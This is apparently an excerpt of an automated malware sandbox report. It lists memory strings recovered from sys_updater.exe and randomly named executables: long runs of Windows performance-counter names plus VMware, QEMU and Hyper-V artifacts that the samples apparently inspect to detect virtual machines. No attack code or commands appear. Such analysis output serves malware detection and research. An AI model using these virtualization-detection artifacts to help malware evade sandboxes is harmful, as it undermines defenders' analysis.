Transition Cost4830Context Switch Time4832C1 Transition
                            Source: sys_updater.exe, 0000001F.00000003.2932929052.0000020E479B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 2Hyper-V VM Vid Partitionm
                            Source: sys_updater.exe, 0000001F.00000003.2811467731.0000020E47B7C000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2805113043.0000020E47B7C000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2804170515.0000020E47B7C000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2811357939.0000020E47B7C000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2810284197.0000020E47B7C000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2811869808.0000020E47B61000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence N
                            Source: sys_updater.exe, 0000001F.00000003.2895586429.0000020E494BC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
                            Source: sys_updater.exe, 00000018.00000003.2634417084.0000021E02FEC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ws Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot00
                            Source: sys_updater.exe, 0000001B.00000003.2788314764.00000159F1AC7000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2800169129.00000159F1AC7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6242WorkflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency48
                            Source: sys_updater.exe, 0000001F.00000003.2801569379.0000020E47A31000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2800353186.0000020E47A37000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2800236656.0000020E47A23000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2801075692.0000020E47A3B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HW
                            Source: sys_updater.exe, 00000022.00000003.2893512724.00000237D30B4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: flows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB Flushes Base4972Hyper-V Hypervisor Root Virtual Processor4974Total Run Time4976Hypervisor Run Time4978Remote Node Run Time4980Normalized Run Time4982Ideal Cpu4984Hypercalls/sec4986Hypercalls Cost4988Page Invalidations/sec4990Page Invalidations Cost4992Control Register Accesses/sec4994Control Register
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2144961325.00000234D59EB000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2145009528.00000234D59EB000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2145443872.00000234D59EB000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2143192474.00000234D59EB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0Hosted Cache: Segment offers queue size9612Publication Cache: Published contents9614Local Cache: Average access time3432WSMan Quota Statistics3434Total Requests/Second3436User Quota Violations/Second3438System Quota Violations/Second3440Active Shells3442Active Operations3444Active Users3446Process ID1914Hyper-V VM Vid Partition1916Physical Pages Allocated1918Preferred NUMA Node Index1920Remote Physical Pages1922ClientHandles1924CompressPackTimeInUs1926CompressUnpackTimeInUs1928CompressPackInputSizeInBytes1930CompressUnpackInputSizeInBytes1932CompressPackOutputSizeInBytes1934CompressUnpackOutputSizeInBytes1936CompressUnpackUncompressedInputSizeInBytes1938CompressPackDiscardedSizeInBytes1940CompressWorkspaceSizeInBytes1942CompressScratchPoolSizeInBytes1944CryptPackTimeInUs1946CryptUnpackTimeInUs1948CryptPackInputSizeInBytes1950CryptUnpackInputSizeInBytes1952CryptPackOutputSizeInBytes1954CryptUnpackOutputSizeInBytes1956CryptScratchPoolSizeInBytes
                            Source: sys_updater.exe, 0000001B.00000003.2765696343.00000159F1AC7000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2788314764.00000159F1AC7000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2800169129.00000159F1AC7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: JHyper-V Hypervisor Logical ProcessorH
                            Source: sys_updater.exe, 0000001B.00000003.2765696343.00000159F1AA2000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2788314764.00000159F1A9B000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2800169129.00000159F1AA3000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2932929052.0000020E479B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V qbqdsitfxsrfbfn Bus
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2170903109.00000234D3F9E000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2180148890.00000234D3FA5000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2184700567.00000234D3FA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DHyper-V Hypervisor Root Partition\Win&
                            Source: sys_updater.exe, 00000022.00000003.2923163784.00000237D3099000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: t Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB Flushes Base4972Hyper-V Hypervisor Root Virtual Processor4974Total Run Time4976Hypervisor Run Time4978Remote Node Run Time4980Normalized Run Time4982Ideal Cpu4984Hypercalls/sec4986Hypercalls Cost4988Page Invalidations/sec4990Page Invalidations Cost4992Control Register Accesses/sec4994Control Register Accesses Cost4996IO Instructions/sec4998IO Instructions Cost5000HLT Instructions/sec5002HLT Instructions Cost5004MWAIT Instructions/sec5006MWAIT Instructions Cost5008CPUID Instructions/sec5010CPUID Instructions Cost5012MSR Accesses/sec5014MSR Accesses Cost5016Other Intercepts/sec5018Other Intercepts Cost5020External Interrupts/sec5022External Interrupts Cost5024Pend
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2141599628.00000234D4000000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: quence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB Flushes Base4972Hyper-V Hypervisor Root Virtual Processor4974Total Run Time4976Hypervisor Run Time4978Remote Node Run Time4980Normalized Run Time4982Ideal Cpu4984Hypercalls/sec4986Hypercalls Cost4988Page Invalidations/sec4990Page Invalidations Cost4992Control Register Accesses/sec4994Control Register Accesses Cost4996IO Instructions/sec4998IO Instructions Cost5000HLT Instructions/sec5002HLT Instructions Cost5004MWAIT Instructions/sec5006MWAIT Instructions Cost5008CPUID Instructions/sec5010CPUID Instructions Cost5012MSR Accesses/sec5014MSR Accesses Cost5016Other Intercepts/sec5018Other Intercepts Cost5020External Interrupts/sec5022External Interrupts Cost5024Pending Interrupts/sec5026Pending Interrupts Cost5028Emulated Instructions/sec5030Emulated Instructions Cost
                            Source: sys_updater.exe, 0000001B.00000003.2765696343.00000159F1AC7000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2788314764.00000159F1AC7000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2800169129.00000159F1AC7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DHyper-V Virtual Machine Bus Pipes`
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2170903109.00000234D3F9E000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2180148890.00000234D3FA5000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2184700567.00000234D3FA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V qbqdsitfxsrfbfn Bus Pipes)
                            Source: HM3SOlbpH71yEXUIEAOeIiGX.exe, 0000000A.00000002.1819425581.0000000004DC5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: DQEMu
                            Source: sys_updater.exe, 0000001B.00000003.2712059415.00000159F3429000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2712604847.00000159F3429000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2711491206.00000159F3422000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flu
                            Source: sys_updater.exe, 0000001F.00000003.2840033423.0000020E47BEF000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2841814217.0000020E47BEF000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2840639497.0000020E47BEF000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2838230496.0000020E47BEF000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2839786737.0000020E47BEF000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2837566535.0000020E47BEF000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2837380902.0000020E47BEF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot rea
                            Source: sys_updater.exe, 00000018.00000003.2688850080.0000021E016A9000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2664610216.0000021E016B4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Dynamic Memory Integration ServiceY
                            Source: sys_updater.exe, 00000018.00000003.2688850080.0000021E016A9000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2664610216.0000021E016B4000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2765696343.00000159F1AC7000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2788314764.00000159F1AC7000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2800169129.00000159F1AC7000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2932929052.0000020E479B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: X2Hyper-V VM Vid Partition
                            Source: sys_updater.exe, 0000001B.00000003.2765696343.00000159F1AC7000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2788314764.00000159F1AC7000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2800169129.00000159F1AC7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VHyper-V Dynamic Memory Integration Service&Al
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2170903109.00000234D3F9E000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2180148890.00000234D3FA5000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2184700567.00000234D3FA8000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2688850080.0000021E016A9000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2664610216.0000021E016B4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Root Partitionl
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2170903109.00000234D3F9E000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2180148890.00000234D3FA5000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2184700567.00000234D3FA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VHyper-V Dynamic Memory Integration Service"C
                            Source: sys_updater.exe, 00000018.00000003.2688850080.0000021E016A9000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2664610216.0000021E016B4000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2765696343.00000159F1AA2000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2788314764.00000159F1A9B000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2800169129.00000159F1AA3000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2932929052.0000020E479B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V qbqdsitfxsrfbfn Bus Pipes
                            Source: sys_updater.exe, 00000018.00000003.2688850080.0000021E016A9000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2664610216.0000021E016B4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: THyper-V Hypervisor Root Virtual Processor
                            Source: sys_updater.exe, 00000018.00000003.2688850080.0000021E016A9000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2664610216.0000021E016B4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: THyper-V Hypervisor Root Virtual Processor
                            Source: sys_updater.exe, 00000018.00000003.2688850080.0000021E016A9000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2664610216.0000021E016B4000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2932929052.0000020E479B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sWDHyper-V Hypervisor Root Partition
                            Source: sys_updater.exe, 0000001F.00000003.2932929052.0000020E479B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &Hyper-V HypervisorZ
                            Source: sys_updater.exe, 0000001B.00000003.2765696343.00000159F1AC7000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2788314764.00000159F1AC7000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2800169129.00000159F1AC7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AlDHyper-V Virtual Machine Bus Pipeshzh
                            Source: sys_updater.exe, 00000018.00000003.2688850080.0000021E016A9000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2664610216.0000021E016B4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VHyper-V Dynamic Memory Integration ServicelS
